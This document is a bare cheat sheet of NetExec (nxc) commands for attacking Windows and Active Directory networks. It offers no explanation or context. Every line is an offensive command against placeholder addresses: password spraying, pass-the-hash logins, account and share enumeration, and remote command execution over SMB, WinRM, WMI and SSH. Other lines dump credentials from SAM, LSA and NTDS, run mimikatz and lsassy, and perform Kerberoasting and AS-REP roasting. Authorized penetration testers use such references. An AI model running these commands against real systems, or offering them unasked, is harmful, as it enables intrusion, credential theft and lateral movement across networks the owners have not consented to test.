NetExec (nxc) — the Swiss Army knife for Windows/AD lateral movement, credential spraying, and post-exploitation.
nxc smb 192.168.1.0/24
nxc smb 10.10.10.1 -u user -p password
nxc smb 10.10.10.1 -u user -H NTLMhash
nxc smb 192.168.1.0/24 -u user -p password
nxc smb 10.10.10.1 -u users.txt -p passwords.txt --continue-on-success
nxc smb 10.10.10.1 -u user -p password --shares
nxc smb 10.10.10.1 -u user -p password --sessions
nxc smb 10.10.10.1 -u user -p password --users
nxc smb 10.10.10.1 -u user -p password --groups
nxc smb 10.10.10.1 -u user -p password --pass-pol
nxc smb 10.10.10.1 -u user -p password --rid-brute
nxc smb 10.10.10.1 -u user -p password -x "whoami"
nxc smb 10.10.10.1 -u user -p password -X "Get-Process"
nxc winrm 10.10.10.1 -u user -p password -x "whoami"
nxc wmi 10.10.10.1 -u user -p password -x "whoami"
nxc smb 10.10.10.1 -u user -p password --sam
nxc smb 10.10.10.1 -u user -p password --lsa
nxc smb 10.10.10.1 -u user -p password --ntds
nxc smb 10.10.10.1 -u user -p password -M mimikatz
nxc smb 10.10.10.1 -u user -p password -M lsassy
nxc ldap 10.10.10.1 -u user -p password --asreproast asrep.txt
nxc ldap 10.10.10.1 -u user -p password --kerberoasting kerb.txt
nxc ldap 10.10.10.1 -u user -p password --bloodhound -ns 10.10.10.1 -c All
nxc ldap 10.10.10.1 -u user -p password --gmsa
nxc mssql 10.10.10.1 -u sa -p password -q "SELECT @@version"
nxc mssql 10.10.10.1 -u sa -p password --local-auth
nxc ssh 10.10.10.1 -u user -p password -x "id"
nxc rdp 192.168.1.0/24 -u user -p password